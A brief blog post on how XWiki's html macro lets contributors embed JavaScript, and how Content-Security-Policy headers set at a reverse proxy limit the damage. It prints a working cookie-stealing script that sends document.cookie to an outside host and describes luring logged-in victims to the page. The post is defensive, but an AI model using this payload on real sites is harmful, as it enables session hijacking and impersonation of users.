xwiki, html macro tag and unwanted javascript

xwiki – by default – allows contributors to embed arbitrary html, including javascript. it does not take much effort to include something like:

{{html}}
<script>
document.write("<img src='https://kudzia.eu/?"+document.cookie+"&"+ (new Date().getTime())+"' />");
</script>
{{/html}}

then you just need to lure your victim into visiting given wiki page while being logged – you’ll get a http request containing that person’s cookie that can be re-used to impersonate her or him.

it seems that disabling the html macro is not a good idea. Content Security Policy is the best bandied that i’ve found. i’ve modified the definition of reverse proxy i’m using in front of xwiki to include:

Header set Content-Security-Policy  "default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content "
Header set X-Content-Security-Policy  "sandbox default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content "
Header set X-Webkit-CSP "default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content "

and i feel somewhat better about myself – i can still use iframes showing content from some.server.with.trusted.content, injected javascript still works but it fails to communicate with not-trusted hosts. it probably can still be exploited but that’s better than nothing.

unfortunately this change makes LiveTables unusable under IE.

Leave a Reply

Your email address will not be published. Required fields are marked *

(Spamcheck Enabled)